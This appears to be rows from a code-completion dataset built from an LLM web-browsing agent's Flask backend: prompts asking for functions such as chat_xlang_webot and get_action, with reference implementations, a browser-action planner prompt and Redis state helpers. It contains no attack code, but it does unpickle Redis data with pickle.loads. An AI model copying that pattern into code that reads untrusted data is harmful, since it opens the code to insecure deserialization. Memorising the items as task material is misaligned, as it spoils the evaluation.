import redis
import json
import pickle
import traceback
from flask import Response, request, stream_with_context
from typing import Dict, Union
import os
from langchain.schema import HumanMessage, SystemMessage
from backend.api.language_model import get_llm
from backend.main import app, message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL
from backend.schemas import DEFAULT_USER_ID
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.models import ChatOpenAI
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_webot_agent
from real_agents.web_agent import WebBrowsingExecutor, WebotExecutor
def get_plan(instruction: str, start_url: str, chat_llm: ChatOpenAI):
# fixme: Move this into a separate chain or executors to decompose the LLMs
system_message = f"""
You are a planner to assist another browser automation assistant.
Here is the instruction for the other assistant:
```
You MUST take one of the following actions. NEVER EVER EVER make up actions that do not exist:
1. click(element): Clicks on an element
2. setValue(element, value: string): Focuses on and sets the value of an input element
3. finish(): Indicates the task is finished
4. fail(): Indicates that you are unable to complete the task
You will be given a task to perform and the current state of the DOM. You will also be given previous actions that you have taken. You may retry a failed action up to one time.
This is an example of an action:
<Thought>I should click the add to cart button</Thought>
<Action>click(223)</Action>
You MUST always include the <Thought> and <Action> open/close tags or else your response will be marked as invalid.
Rules you MUST follow:
1. You must only take one step at a time. You cannot take multiple actions in a single response.
2. You should not plan an action whose only purpose is to present the result to the user; you only need to perform the available actions. If the information on the current page is enough for the user to solve the problem, you should finish.
```
Now your responsibility is to give a step-by-step plan according to the user's instruction. This plan will be given to the assistant as a reference when it performs the task.
""".strip()
human_message = f"""
The user requests the following task:
{instruction}
Now you are at {start_url}
Provide a plan to do this (you can use a pseudo-description, as in the example below, to describe each item).
Here is an example case:
request: Go to google calendar to schedule a meeting
current url: "https://google.com"
example plan:
1. setValue(searchBar, "google calendar")
2. click(search)
3. click(the item with title of google calendar)
4.1 if the user has logged in
do nothing
4.2 if the user hasn't logged in
do login
5. click(create event button)
6. setValue(event title input bar, "meeting")
7. click(save event button)
8. finish()
""".strip()
messages = [SystemMessage(content=system_message),
HumanMessage(content=human_message)]
response = chat_llm(messages).content
return response | null |
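A minimal usage sketch for the planner helper above, assuming valid OpenAI credentials are configured in the environment; the model name, instruction, and start URL are illustrative only.

# Hypothetical invocation of get_plan; the inputs and model choice are illustrative.
from real_agents.adapters.models import ChatOpenAI

chat_llm = ChatOpenAI(model_name="gpt-3.5-turbo-16k", temperature=0, verbose=True)
plan = get_plan(
    instruction="Schedule a 30-minute meeting on Google Calendar for tomorrow at 10am",
    start_url="https://www.google.com",
    chat_llm=chat_llm,
)
print(plan)  # a numbered, step-by-step pseudo-action plan produced by the planner prompt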
188,445 | from time import sleep
import copy
import redis
import json
import pickle
import traceback
from flask import Response, request, stream_with_context
from typing import Dict, Union
import os
from langchain.schema import HumanMessage, SystemMessage
from backend.api.language_model import get_llm
from backend.main import app, message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL
from backend.schemas import DEFAULT_USER_ID
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.models import ChatOpenAI
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_webot_agent
from real_agents.web_agent import WebBrowsingExecutor, WebotExecutor
def reset_webot(user_id: str, chat_id: str):
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
def reset_webot_status(user_id: str, chat_id: str):
webot_status = {"webot_status": "idle", "url": None}
save_webot_status_to_redis(user_id, chat_id, webot_status)
def create_webot_interaction_executor(
llm: BaseLanguageModel,
llm_name: str,
user_id: str,
chat_id: str
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
llm: A llm model.
llm_name: A string llm name.
user_id: A string of user id.
chat_id: A string chat id.
Returns:
An agent executor.
"""
# Initialize memory
memory = ConversationReActBufferMemory(memory_key="chat_history",
return_messages=True, max_token_limit=10000)
class RunWebot:
def __init__(self, webot: WebotExecutor, llm: BaseLanguageModel, user_id: str,
chat_id: str):
self.llm = llm
self.webot = webot
self.user_id = user_id
self.chat_id = chat_id
def run(self, term: str) -> Union[str, Dict, DataModel]:
try:
user_id = self.user_id
chat_id = self.chat_id
reset_webot(user_id=user_id, chat_id=chat_id)
reset_webot_status(user_id=user_id, chat_id=chat_id)
raw_observation = self.webot.run(user_intent=term, llm=self.llm)
instruction, start_url = raw_observation["instruction"], \
raw_observation["start_url"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.instruction = instruction
# webot.plan = get_plan(instruction, start_url)
webot.plan = ""
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
webot_status = {
"webot_status": "running",
"url": start_url
}
save_webot_status_to_redis(user_id=user_id, chat_id=chat_id,
webot_status=webot_status)
while True:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
if webot.finish or webot.interrupt or webot.error or webot.fail:
break
else:
sleep(0.5)
save_webot_status_to_redis(user_id=user_id, chat_id=chat_id,
webot_status={"webot_status": "idle",
"url": None})
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.instruction = None
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
if webot.finish:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
action_history = webot.action_history
last_page = webot.pages_viewed[-1]
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": json.dumps({"action_history": action_history,
"last_page": last_page}, indent=4),
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.fail:
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": "The webot failed to execute the instruction.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.interrupt:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": "The web browsing is interrupted by user.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.error:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": "Error occurs during web browsing.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
except Exception as e:
print(traceback.format_exc())
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": f"Failed in web browsing with the input: {term}, please try again later.",
"intermediate_steps": json.dumps({"error": str(e)})
}
)
return observation
webot = WebotExecutor.from_webot()
llm = copy.deepcopy(llm)
run_webot = RunWebot(webot, llm, chat_id=chat_id, user_id=user_id)
tools = [Tool(name=webot.name, func=run_webot.run, description=webot.description)]
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_webot_agent(
tools, llm, continue_model, memory=memory, verbose=True
)
return interaction_executor
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
# Insert User Message, if regenerate there is no need to insert again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
class AgentStreamingStdOutCallbackHandler(StreamingStdOutCallbackHandler):
is_end = False
generated_tokens: list = []
for_display: list = []
# Automata
pda = JSON_PDA()
llm_call_id = 0
_in_json = False
_in_key = False
_in_value = False
_direct_display = True
_normal_json = False
json_key: str = ""
json_tmp_stack: list = []
action_key_appear = False
def always_verbose(self) -> bool:
"""Whether to call verbose callbacks even if verbose is False."""
return True
def on_llm_start(self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any) -> None:
self.is_end = False
self.generated_tokens = []
self.pda = JSON_PDA()
self.llm_call_id += 1
self._in_json = False
self._in_key = False
self._in_value = False
self._direct_display = True
self._normal_json = False
self.json_key = ""
self.json_tmp_stack = []
def on_llm_new_token(self, token: str, **kwargs: Any) -> None:
"""
Run on new LLM token. Only available when streaming is enabled.
Tokens whose type can be decided ('plain', 'identifier', 'key', 'action', 'action_input') are stored in `self.for_display`.
"""
self.generated_tokens.append(token)
# Automata that monitor json block
for char in token:
self.pda.transition(char)
# Handle the logic of sentences and json blocks
_type = "plain"
if self.pda.state in ["open_brace", "open_one_backtick"]:
self._in_json = True
self._direct_display = False
self._normal_json = False
self.action_key_appear = False
if self._in_json and not self._normal_json:
_type = "identifier"
if self.pda.state == "in_block":
_type = "plain"
self._normal_json = True
if self.pda.state == "open_key_quote":
if self._in_key:
self.json_key += char
_type = "key"
self._in_key = True
else:
self._in_key = False
if self.pda.state == "open_value_quote" or self.pda.state == "open_value_quote_brace":
if self._in_value:
_type = self.json_key
self._in_value = True
else:
if self._in_value:
self.json_key = ""
self._in_value = False
if self.pda.state == "close_key_quote":
# Normal json block
if self.json_key not in ["action", "action_input"]:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self.for_display.append({"text": char, "type": "plain", "llm_call_id": self.llm_call_id})
self._normal_json = True
continue
else:
if self.json_key == "action":
self.action_key_appear = True
elif self.json_key == "action_input" and self.action_key_appear:
# Action json block
for char_item in self.json_tmp_stack:
char_item["llm_call_id"] = self.llm_call_id
self.for_display.append(char_item)
self.json_tmp_stack = []
self._direct_display = True
else:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self._direct_display = True
if self.pda.state == "start":
self._in_json = False
self.for_display.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
) if self._direct_display else self.json_tmp_stack.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
)
def on_llm_end(self, response, **kwargs: Any) -> None:
"""Run when LLM ends running."""
self.is_end = True
for char_item in self.json_tmp_stack:
self.for_display.append({"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id})
def on_tool_end(self, output: Union[DataModel, str], **kwargs: Any) -> None:
"""Run on tool end to add observation data model."""
self.for_display.append({"text": output, "type": "block", "llm_call_id": self.llm_call_id})
The provided code snippet includes necessary dependencies for implementing the `chat_xlang_webot` function. Write a Python function `def chat_xlang_webot() -> Dict` to solve the following problem:
Returns the chat response of web agent.
Here is the function:
def chat_xlang_webot() -> Dict:
"""Returns the chat response of web agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = request_json["parent_message_id"]
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.4)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# Get language model
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
stream_handler = AgentStreamingStdOutCallbackHandler()
# Build executor and run chat
# reset webot and status
reset_webot(user_id=user_id, chat_id=chat_id)
reset_webot_status(user_id=user_id, chat_id=chat_id)
interaction_executor = create_webot_interaction_executor(
llm=llm,
llm_name=llm_name,
chat_id=chat_id,
user_id=user_id
)
activated_message_list = message_pool.get_activated_message_list(user_id,
chat_id,
list(),
parent_message_id)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
stream_handler=stream_handler,
llm_name=llm_name,
app_type="webot",
),
content_type="application/json",
)
)
except Exception as e:
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{OVERLOAD} backend is currently overloaded") | Returns the chat response of web agent. |
188,446 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with a None instruction if the webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def get_instruction() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
"instructions": webot.instruction
}) | null |
188,447 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def get_webot_status_from_redis(user_id: str, chat_id: str):
webot_status_json = r.get(f'webot_status_{user_id}_{chat_id}')
if webot_status_json is not None:
webot_status = json.loads(webot_status_json)
return webot_status
else:
return {}
def get_webot_status() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot_status_json = get_webot_status_from_redis(user_id=user_id, chat_id=chat_id)
return jsonify(webot_status_json) if webot_status_json is not None else jsonify(
{"webot_status": None, "url": None}) | null |
188,448 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def reset_webot_status(user_id: str, chat_id: str):
webot_status = {"webot_status": "idle", "url": None}
save_webot_status_to_redis(user_id, chat_id, webot_status)
def reset_status() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
reset_webot_status(user_id=user_id, chat_id=chat_id)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
}) | null |
188,449 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with a None instruction if the webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
The provided code snippet includes necessary dependencies for implementing the `get_action` function. Write a Python function `def get_action() -> Response` to solve the following problem:
Gets the next action to take given the current page HTML.
Here is the function:
def get_action() -> Response:
"""Gets the next action to take for a given the current page HTML."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
# Get the simplified page HTML from the already-parsed request parameters
processed_html = request_json["processed_html"]
llm = get_llm("gpt-4")
result = webot.run(processed_html, llm=llm)
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
"action_response": result,
}) | Gets the next action to take given the current page HTML. |
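As a hedged sketch of the extension-side call that would drive get_action above: the route and the DOM-simplification format are assumptions; the handler itself only requires "chat_id" and "processed_html" (plus an optional "user_id").

# Hypothetical browser-extension call to the get_action endpoint; the route and the
# simplified DOM string are illustrative assumptions.
import requests

simplified_dom = '<button id="223">Add to cart</button>'   # illustrative only
resp = requests.post(
    "http://localhost:8000/api/webot/action",               # hypothetical route
    json={"chat_id": "example-chat-id", "processed_html": simplified_dom},
)
print(resp.json()["action_response"])
# e.g. "<Thought>I should click the add to cart button</Thought><Action>click(223)</Action>"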
188,450 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with a None instruction if the webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `interrupt` function. Write a Python function `def interrupt() -> Response` to solve the following problem:
Interrupts the current webot.
Here is the function:
def interrupt() -> Response:
"""Interrupts the current webot."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
interrupt = request_json["interrupt"]
if interrupt:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.actions_taken.append("interrupt")
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
})
return jsonify({"message": "No interrupt signal received."}) | Interrupts the current webot. |
188,451 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with a None instruction if the webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `error` function. Write a Python function `def error() -> Response` to solve the following problem:
Appends action 'error' to the current webot.
Here is the function:
def error() -> Response:
"""Appends action 'error' to the current webot."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
error = request_json["error"]
if error:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.actions_taken.append("error")
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
})
return jsonify({"message": "No error signal received."}) | Appends action 'error' to the current webot. |
188,452 | from typing import Dict
from flask import request, jsonify, Response
from backend.main import message_pool
from backend.app import app
from backend.api.language_model import get_llm
from backend.utils.utils import get_user_and_chat_id_from_request_json
from real_agents.adapters.executors import QuestionSuggestionExecutor
from real_agents.adapters.memory import ConversationReActBufferMemory
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
The provided code snippet includes necessary dependencies for implementing the `recommend` function. Write a Python function `def recommend() -> dict | Response` to solve the following problem:
Recommends potential inputs for users.
Here is the function:
def recommend() -> dict | Response:
"""Recommends potential inputs for users. """
try:
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
parent_message_id = int(request_json["parent_message_id"])
user_intent = request_json["user_intent"]
# Find the mainstay message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(), parent_message_id=parent_message_id
)
chat_memory = ConversationReActBufferMemory(memory_key="chat_history", return_messages=True)
message_pool.load_agent_memory_from_list(chat_memory, activated_message_list)
question_suggestion_executor = QuestionSuggestionExecutor()
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.7)
kwargs = {
"temperature": temperature,
}
# Get language model
llm = get_llm(llm_name, **kwargs)
follow_questions = question_suggestion_executor.run(
user_intent=user_intent,
llm=llm,
chat_memory=chat_memory,
